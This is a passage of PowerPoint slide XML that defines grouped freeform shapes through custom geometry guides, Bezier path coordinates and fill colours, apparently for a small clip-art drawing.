                  <a:gd name="T1" fmla="*/ 17 h 27"/>
                  <a:gd name="T2" fmla="*/ 46 w 46"/>
                  <a:gd name="T3" fmla="*/ 1 h 27"/>
                  <a:gd name="T4" fmla="*/ 16 w 46"/>
                  <a:gd name="T5" fmla="*/ 10 h 27"/>
                  <a:gd name="T6" fmla="*/ 0 w 46"/>
                  <a:gd name="T7" fmla="*/ 25 h 27"/>
                  <a:gd name="T8" fmla="*/ 29 w 46"/>
                  <a:gd name="T9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27">
                    <a:moveTo>
                      <a:pt x="29" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="12"/>
                      <a:pt x="45" y="6"/>
                      <a:pt x="46" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="16" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="15"/>
                      <a:pt x="1" y="21"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="27"/>
                      <a:pt x="18" y="24"/>
                      <a:pt x="29" y="17"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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509" name="Group 780"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4540885" y="2029214"/>
              <a:ext cx="396875" cy="674687"/>
              <a:chOff x="-7292" y="1988"/>
              <a:chExt cx="888" cy="1514"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="510" name="Freeform 781"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7039" y="2434"/>
                <a:ext cx="0" cy="943"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 943 h 943"/>
                  <a:gd name="T1" fmla="*/ 0 h 943"/>
                  <a:gd name="T2" fmla="*/ 943 h 94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943">
                    <a:moveTo>
                      <a:pt x="0" y="943"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="943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1" name="Line 782"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="-7039" y="2434"/>
                <a:ext cx="0" cy="94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2" name="Freeform 783"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7048" y="2425"/>
                <a:ext cx="18" cy="961"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 8"/>
                  <a:gd name="T1" fmla="*/ 403 h 407"/>
                  <a:gd name="T2" fmla="*/ 0 w 8"/>
                  <a:gd name="T3" fmla="*/ 4 h 407"/>
                  <a:gd name="T4" fmla="*/ 4 w 8"/>
                  <a:gd name="T5" fmla="*/ 0 h 407"/>
                  <a:gd name="T6" fmla="*/ 4 w 8"/>
                  <a:gd name="T7" fmla="*/ 0 h 407"/>
                  <a:gd name="T8" fmla="*/ 8 w 8"/>
                  <a:gd name="T9" fmla="*/ 4 h 407"/>
                  <a:gd name="T10" fmla="*/ 8 w 8"/>
                  <a:gd name="T11" fmla="*/ 4 h 407"/>
                  <a:gd name="T12" fmla="*/ 8 w 8"/>
                  <a:gd name="T13" fmla="*/ 403 h 407"/>
                  <a:gd name="T14" fmla="*/ 4 w 8"/>
                  <a:gd name="T15" fmla="*/ 407 h 407"/>
                  <a:gd name="T16" fmla="*/ 4 w 8"/>
                  <a:gd name="T17" fmla="*/ 407 h 407"/>
                  <a:gd name="T18" fmla="*/ 0 w 8"/>
                  <a:gd name="T19" fmla="*/ 403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07">
                    <a:moveTo>
                      <a:pt x="0" y="40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03"/>
                      <a:pt x="8" y="403"/>
                      <a:pt x="8" y="403"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="405"/>
                      <a:pt x="6" y="407"/>
                      <a:pt x="4" y="407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="407"/>
                      <a:pt x="4" y="407"/>
                      <a:pt x="4" y="407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="407"/>
                      <a:pt x="0" y="405"/>
                      <a:pt x="0" y="4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3" name="Freeform 784"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7077" y="2137"/>
                <a:ext cx="340" cy="378"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 340"/>
                  <a:gd name="T1" fmla="*/ 378 h 378"/>
                  <a:gd name="T2" fmla="*/ 340 w 340"/>
                  <a:gd name="T3" fmla="*/ 0 h 378"/>
                  <a:gd name="T4" fmla="*/ 0 w 340"/>
                  <a:gd name="T5" fmla="*/ 378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0" h="378">
                    <a:moveTo>
                      <a:pt x="0" y="378"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="340" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37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4" name="Line 785"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="-7077" y="2137"/>
                <a:ext cx="340" cy="37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5" name="Freeform 786"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7086" y="2125"/>
                <a:ext cx="361" cy="399"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 153"/>
                  <a:gd name="T1" fmla="*/ 168 h 169"/>
                  <a:gd name="T2" fmla="*/ 1 w 153"/>
                  <a:gd name="T3" fmla="*/ 162 h 169"/>
                  <a:gd name="T4" fmla="*/ 1 w 153"/>
                  <a:gd name="T5" fmla="*/ 162 h 169"/>
                  <a:gd name="T6" fmla="*/ 145 w 153"/>
                  <a:gd name="T7" fmla="*/ 2 h 169"/>
                  <a:gd name="T8" fmla="*/ 151 w 153"/>
                  <a:gd name="T9" fmla="*/ 2 h 169"/>
                  <a:gd name="T10" fmla="*/ 151 w 153"/>
                  <a:gd name="T11" fmla="*/ 2 h 169"/>
                  <a:gd name="T12" fmla="*/ 151 w 153"/>
                  <a:gd name="T13" fmla="*/ 8 h 169"/>
                  <a:gd name="T14" fmla="*/ 151 w 153"/>
                  <a:gd name="T15" fmla="*/ 8 h 169"/>
                  <a:gd name="T16" fmla="*/ 7 w 153"/>
                  <a:gd name="T17" fmla="*/ 167 h 169"/>
                  <a:gd name="T18" fmla="*/ 4 w 153"/>
                  <a:gd name="T19" fmla="*/ 169 h 169"/>
                  <a:gd name="T20" fmla="*/ 4 w 153"/>
                  <a:gd name="T21" fmla="*/ 169 h 169"/>
                  <a:gd name="T22" fmla="*/ 1 w 153"/>
                  <a:gd name="T23" fmla="*/ 168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3" h="169">
                    <a:moveTo>
                      <a:pt x="1" y="168"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="166"/>
                      <a:pt x="0" y="164"/>
                      <a:pt x="1" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="1" y="162"/>
                      <a:pt x="1" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="2"/>
                      <a:pt x="145" y="2"/>
                      <a:pt x="145" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="1"/>
                      <a:pt x="149" y="0"/>
                      <a:pt x="151" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="2"/>
                      <a:pt x="151" y="2"/>
                      <a:pt x="151" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="3"/>
                      <a:pt x="153" y="6"/>
                      <a:pt x="151" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="8"/>
                      <a:pt x="151" y="8"/>
                      <a:pt x="151" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="167"/>
                      <a:pt x="7" y="167"/>
                      <a:pt x="7" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="168"/>
                      <a:pt x="5" y="169"/>
                      <a:pt x="4" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="169"/>
                      <a:pt x="4" y="169"/>
                      <a:pt x="4" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="169"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="1" y="1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6" name="Freeform 787"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7292" y="2949"/>
                <a:ext cx="508" cy="553"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 215"/>
                  <a:gd name="T1" fmla="*/ 205 h 234"/>
                  <a:gd name="T2" fmla="*/ 191 w 215"/>
                  <a:gd name="T3" fmla="*/ 198 h 234"/>
                  <a:gd name="T4" fmla="*/ 117 w 215"/>
                  <a:gd name="T5" fmla="*/ 183 h 234"/>
                  <a:gd name="T6" fmla="*/ 117 w 215"/>
                  <a:gd name="T7" fmla="*/ 182 h 234"/>
                  <a:gd name="T8" fmla="*/ 117 w 215"/>
                  <a:gd name="T9" fmla="*/ 10 h 234"/>
                  <a:gd name="T10" fmla="*/ 107 w 215"/>
                  <a:gd name="T11" fmla="*/ 0 h 234"/>
                  <a:gd name="T12" fmla="*/ 97 w 215"/>
                  <a:gd name="T13" fmla="*/ 10 h 234"/>
                  <a:gd name="T14" fmla="*/ 97 w 215"/>
                  <a:gd name="T15" fmla="*/ 182 h 234"/>
                  <a:gd name="T16" fmla="*/ 97 w 215"/>
                  <a:gd name="T17" fmla="*/ 183 h 234"/>
                  <a:gd name="T18" fmla="*/ 24 w 215"/>
                  <a:gd name="T19" fmla="*/ 198 h 234"/>
                  <a:gd name="T20" fmla="*/ 0 w 215"/>
                  <a:gd name="T21" fmla="*/ 205 h 234"/>
                  <a:gd name="T22" fmla="*/ 20 w 215"/>
                  <a:gd name="T23" fmla="*/ 210 h 234"/>
                  <a:gd name="T24" fmla="*/ 83 w 215"/>
                  <a:gd name="T25" fmla="*/ 200 h 234"/>
                  <a:gd name="T26" fmla="*/ 97 w 215"/>
                  <a:gd name="T27" fmla="*/ 231 h 234"/>
                  <a:gd name="T28" fmla="*/ 107 w 215"/>
                  <a:gd name="T29" fmla="*/ 234 h 234"/>
                  <a:gd name="T30" fmla="*/ 119 w 215"/>
                  <a:gd name="T31" fmla="*/ 230 h 234"/>
                  <a:gd name="T32" fmla="*/ 132 w 215"/>
                  <a:gd name="T33" fmla="*/ 200 h 234"/>
                  <a:gd name="T34" fmla="*/ 195 w 215"/>
                  <a:gd name="T35" fmla="*/ 210 h 234"/>
                  <a:gd name="T36" fmla="*/ 215 w 215"/>
                  <a:gd name="T37" fmla="*/ 205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5" h="234">
                    <a:moveTo>
                      <a:pt x="215" y="205"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="198"/>
                      <a:pt x="191" y="198"/>
                      <a:pt x="191" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="117" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="10"/>
                      <a:pt x="117" y="10"/>
                      <a:pt x="117" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="4"/>
                      <a:pt x="113" y="0"/>
                      <a:pt x="107" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="0"/>
                      <a:pt x="97" y="4"/>
                      <a:pt x="97" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="183"/>
                      <a:pt x="97" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="198"/>
                      <a:pt x="24" y="198"/>
                      <a:pt x="24" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="205"/>
                      <a:pt x="0" y="205"/>
                      <a:pt x="0" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="210"/>
                      <a:pt x="20" y="210"/>
                      <a:pt x="20" y="210"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="200"/>
                      <a:pt x="83" y="200"/>
                      <a:pt x="83" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="231"/>
                      <a:pt x="97" y="231"/>
                      <a:pt x="97" y="231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="234"/>
                      <a:pt x="107" y="234"/>
                      <a:pt x="107" y="234"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="230"/>
                      <a:pt x="119" y="230"/>
                      <a:pt x="119" y="230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="200"/>
                      <a:pt x="132" y="200"/>
                      <a:pt x="132" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="195" y="210"/>
                      <a:pt x="195" y="210"/>
                      <a:pt x="195" y="210"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="215" y="20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7" name="Freeform 788"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6940" y="1988"/>
                <a:ext cx="494" cy="361"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 209"/>
                  <a:gd name="T1" fmla="*/ 60 h 153"/>
                  <a:gd name="T2" fmla="*/ 32 w 209"/>
                  <a:gd name="T3" fmla="*/ 153 h 153"/>
                  <a:gd name="T4" fmla="*/ 209 w 209"/>
                  <a:gd name="T5" fmla="*/ 6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9" h="153">
                    <a:moveTo>
                      <a:pt x="209" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="0"/>
                      <a:pt x="0" y="65"/>
                      <a:pt x="32" y="153"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="209" y="6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8" name="Freeform 789"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6881" y="2097"/>
                <a:ext cx="459" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 194"/>
                  <a:gd name="T1" fmla="*/ 50 h 118"/>
                  <a:gd name="T2" fmla="*/ 191 w 194"/>
                  <a:gd name="T3" fmla="*/ 25 h 118"/>
                  <a:gd name="T4" fmla="*/ 194 w 194"/>
                  <a:gd name="T5" fmla="*/ 29 h 118"/>
                  <a:gd name="T6" fmla="*/ 184 w 194"/>
                  <a:gd name="T7" fmla="*/ 14 h 118"/>
                  <a:gd name="T8" fmla="*/ 68 w 194"/>
                  <a:gd name="T9" fmla="*/ 39 h 118"/>
                  <a:gd name="T10" fmla="*/ 8 w 194"/>
                  <a:gd name="T11" fmla="*/ 109 h 118"/>
                  <a:gd name="T12" fmla="*/ 12 w 194"/>
                  <a:gd name="T13" fmla="*/ 118 h 118"/>
                  <a:gd name="T14" fmla="*/ 73 w 194"/>
                  <a:gd name="T15" fmla="*/ 5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4" h="118">
                    <a:moveTo>
                      <a:pt x="73" y="50"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="22"/>
                      <a:pt x="174" y="11"/>
                      <a:pt x="191" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194" y="29"/>
                      <a:pt x="194" y="29"/>
                      <a:pt x="194" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194" y="29"/>
                      <a:pt x="185" y="15"/>
                      <a:pt x="184" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="0"/>
                      <a:pt x="115" y="11"/>
                      <a:pt x="68" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="63"/>
                      <a:pt x="0" y="93"/>
                      <a:pt x="8" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="109"/>
                      <a:pt x="10" y="114"/>
                      <a:pt x="12" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="101"/>
                      <a:pt x="32" y="73"/>
                      <a:pt x="73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9" name="Freeform 790"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6862" y="2123"/>
                <a:ext cx="458" cy="304"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 194"/>
                  <a:gd name="T1" fmla="*/ 19 h 129"/>
                  <a:gd name="T2" fmla="*/ 187 w 194"/>
                  <a:gd name="T3" fmla="*/ 19 h 129"/>
                  <a:gd name="T4" fmla="*/ 186 w 194"/>
                  <a:gd name="T5" fmla="*/ 18 h 129"/>
                  <a:gd name="T6" fmla="*/ 183 w 194"/>
                  <a:gd name="T7" fmla="*/ 14 h 129"/>
                  <a:gd name="T8" fmla="*/ 65 w 194"/>
                  <a:gd name="T9" fmla="*/ 39 h 129"/>
                  <a:gd name="T10" fmla="*/ 4 w 194"/>
                  <a:gd name="T11" fmla="*/ 107 h 129"/>
                  <a:gd name="T12" fmla="*/ 4 w 194"/>
                  <a:gd name="T13" fmla="*/ 107 h 129"/>
                  <a:gd name="T14" fmla="*/ 4 w 194"/>
                  <a:gd name="T15" fmla="*/ 109 h 129"/>
                  <a:gd name="T16" fmla="*/ 7 w 194"/>
                  <a:gd name="T17" fmla="*/ 113 h 129"/>
                  <a:gd name="T18" fmla="*/ 8 w 194"/>
                  <a:gd name="T19" fmla="*/ 114 h 129"/>
                  <a:gd name="T20" fmla="*/ 126 w 194"/>
                  <a:gd name="T21" fmla="*/ 90 h 129"/>
                  <a:gd name="T22" fmla="*/ 187 w 194"/>
                  <a:gd name="T23" fmla="*/ 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4" h="129">
                    <a:moveTo>
                      <a:pt x="187" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="19"/>
                      <a:pt x="187" y="19"/>
                      <a:pt x="187" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="19"/>
                      <a:pt x="186" y="18"/>
                      <a:pt x="186" y="18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66" y="0"/>
                      <a:pt x="113" y="11"/>
                      <a:pt x="65" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="62"/>
                      <a:pt x="0" y="90"/>
                      <a:pt x="4" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="108"/>
                      <a:pt x="4" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="113"/>
                      <a:pt x="7" y="113"/>
                      <a:pt x="7" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="113"/>
                      <a:pt x="8" y="114"/>
                      <a:pt x="8" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="129"/>
                      <a:pt x="78" y="118"/>
                      <a:pt x="126" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="65"/>
                      <a:pt x="194" y="36"/>
                      <a:pt x="187" y="19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0" name="Freeform 791"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6739" y="2205"/>
                <a:ext cx="132" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 56"/>
                  <a:gd name="T1" fmla="*/ 17 h 34"/>
                  <a:gd name="T2" fmla="*/ 1 w 56"/>
                  <a:gd name="T3" fmla="*/ 25 h 34"/>
                  <a:gd name="T4" fmla="*/ 2 w 56"/>
                  <a:gd name="T5" fmla="*/ 30 h 34"/>
                  <a:gd name="T6" fmla="*/ 35 w 56"/>
                  <a:gd name="T7" fmla="*/ 23 h 34"/>
                  <a:gd name="T8" fmla="*/ 51 w 56"/>
                  <a:gd name="T9" fmla="*/ 1 h 34"/>
                  <a:gd name="T10" fmla="*/ 46 w 56"/>
                  <a:gd name="T11" fmla="*/ 0 h 34"/>
                  <a:gd name="T12" fmla="*/ 30 w 56"/>
                  <a:gd name="T13" fmla="*/ 1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34">
                    <a:moveTo>
                      <a:pt x="30" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="23"/>
                      <a:pt x="7" y="27"/>
                      <a:pt x="1" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="1" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="34"/>
                      <a:pt x="22" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="15"/>
                      <a:pt x="56" y="5"/>
                      <a:pt x="51" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="0"/>
                      <a:pt x="46" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="4"/>
                      <a:pt x="40" y="11"/>
                      <a:pt x="3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1" name="Freeform 792"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6737" y="2203"/>
                <a:ext cx="107" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 45"/>
                  <a:gd name="T1" fmla="*/ 9 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 26 h 28"/>
                  <a:gd name="T4" fmla="*/ 29 w 45"/>
                  <a:gd name="T5" fmla="*/ 18 h 28"/>
                  <a:gd name="T6" fmla="*/ 45 w 45"/>
                  <a:gd name="T7" fmla="*/ 1 h 28"/>
                  <a:gd name="T8" fmla="*/ 17 w 45"/>
                  <a:gd name="T9" fmla="*/ 9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8">
                    <a:moveTo>
                      <a:pt x="17" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="15"/>
                      <a:pt x="1" y="22"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="28"/>
                      <a:pt x="18" y="24"/>
                      <a:pt x="29" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="12"/>
                      <a:pt x="45" y="5"/>
                      <a:pt x="45" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="0"/>
                      <a:pt x="28" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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2" name="Freeform 793"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6576" y="2179"/>
                <a:ext cx="130" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 50 w 55"/>
                  <a:gd name="T1" fmla="*/ 2 h 34"/>
                  <a:gd name="T2" fmla="*/ 44 w 55"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 27 w 55"/>
                  <a:gd name="T5" fmla="*/ 18 h 34"/>
                  <a:gd name="T6" fmla="*/ 0 w 55"/>
                  <a:gd name="T7" fmla="*/ 26 h 34"/>
                  <a:gd name="T8" fmla="*/ 1 w 55"/>
                  <a:gd name="T9" fmla="*/ 30 h 34"/>
                  <a:gd name="T10" fmla="*/ 34 w 55"/>
                  <a:gd name="T11" fmla="*/ 23 h 34"/>
                  <a:gd name="T12" fmla="*/ 50 w 55"/>
                  <a:gd name="T13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34">
                    <a:moveTo>
                      <a:pt x="50" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="1"/>
                      <a:pt x="46" y="0"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="5"/>
                      <a:pt x="37" y="12"/>
                      <a:pt x="27" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="24"/>
                      <a:pt x="6" y="27"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="28"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="1" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="34" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="5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3" name="Freeform 794"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6576" y="2179"/>
                <a:ext cx="104" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 44 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 27"/>
                  <a:gd name="T2" fmla="*/ 17 w 44"/>
                  <a:gd name="T3" fmla="*/ 9 h 27"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 26 h 27"/>
                  <a:gd name="T6" fmla="*/ 27 w 44"/>
                  <a:gd name="T7" fmla="*/ 18 h 27"/>
                  <a:gd name="T8" fmla="*/ 44 w 44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7">
                    <a:moveTo>
                      <a:pt x="44" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="15"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="27"/>
                      <a:pt x="17" y="24"/>
                      <a:pt x="27" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="12"/>
                      <a:pt x="44" y="5"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
